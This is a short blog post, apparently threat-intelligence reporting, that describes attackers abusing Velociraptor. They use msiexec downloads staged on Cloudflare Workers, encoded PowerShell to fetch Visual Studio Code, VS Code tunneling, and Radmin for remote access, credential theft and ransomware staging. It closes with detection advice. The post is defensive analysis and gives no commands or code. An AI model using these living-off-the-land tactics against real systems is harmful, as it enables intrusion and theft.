Tunnel-boring Raptor: When Velociraptor Digs for Attackers
- Javier Conejo del Cerro
- hace 3 días
- 2 Min. de lectura
A recent incident highlights how legitimate forensic tools can be weaponized against defenders. Unknown attackers abused Velociraptor, an open-source endpoint monitoring and forensic tool, to install Visual Studio Code with tunneling capabilities into command-and-control (C2) servers. Using standard Windows utilities and staging via Cloudflare Workers, they turned trusted defensive software into an offensive foothold. Below, we break down the attack step by step.
Phase 1: Initial Access and Delivery
Vector of entry: Attackers relied on the Windows msiexec utility to download an MSI installer from a malicious Cloudflare Workers domain.
Trojanized installer: The MSI was crafted to install Velociraptor, a legitimate forensic tool trusted by IT and security teams. Its use helped the attackers blend into routine monitoring and incident response activity.
Staging infrastructure: Cloudflare Workers acted as the staging ground, not only for Velociraptor but for additional payloads that would follow, ensuring persistence and flexibility.
This phase demonstrates a “living-off-the-land” tactic: leveraging built-in utilities (msiexec) and open-source tools to avoid detection.
Phase 2: Execution and Tunneling
Velociraptor deployment: Once installed, Velociraptor was used to connect to attacker-controlled domains hosted on Cloudflare Workers.
Encoded PowerShell: The tool executed an encoded PowerShell command to silently fetch Visual Studio Code from the staging server.
Tunneling mode enabled: Visual Studio Code was not used for development but launched with the tunnel option enabled, effectively transforming it into a remote access tool. This granted attackers both persistent remote access and remote code execution within the victim’s environment.
Here, we see the dual abuse of legitimate software—Velociraptor as the loader, Visual Studio Code as the tunneling channel.
Phase 3: Additional Payloads and Malicious Capabilities
Extra tools staged: Attackers also deployed utilities like Radmin, providing further remote administration capabilities.
Expanded scope: These tools enabled credential theft, data exfiltration, and laid the groundwork for ransomware operations.
Living off trusted binaries: Because Velociraptor and Visual Studio Code are widely recognized as safe, malicious use blended into normal administrative traffic, reducing the chances of triggering alarms.
This phase underscores how attackers escalate from foothold to full compromise, turning standard IT workflows into vehicles for intrusion.
Phase 4: The Malicious Objective
The combination of Velociraptor and Visual Studio Code tunneling created an environment where attackers could:
Steal credentials from compromised hosts.
Exfiltrate sensitive enterprise data.
Remotely execute commands for reconnaissance or lateral movement.
Prepare the environment for ransomware deployment, treating this tradecraft as a precursor to larger extortion campaigns.
What began as a subtle abuse of trusted software became a stepping stone toward potential large-scale disruption.
Measures to Fend Off the Raptor
Organizations can defend against these tactics by:
Monitoring for unauthorized Velociraptor installations and unexpected forensic tool usage.
Flagging unusual msiexec downloads and encoded PowerShell activity tied to external domains.
Deploying EDR solutions to detect tunneling behaviors and anomalous process chains.
Tracking Cloudflare Workers and staging domains associated with known campaigns.
Securing immutable backups and treating anomalous use of forensic or monitoring tools as potential ransomware precursors.
This incident shows how attackers weaponize the very tools defenders trust. By blending legitimate software into their arsenal, they challenge traditional detection methods and highlight the need for behavioral monitoring, vigilant EDR, and a zero-trust approach to all binaries—no matter how familiar they seem.
Comentarios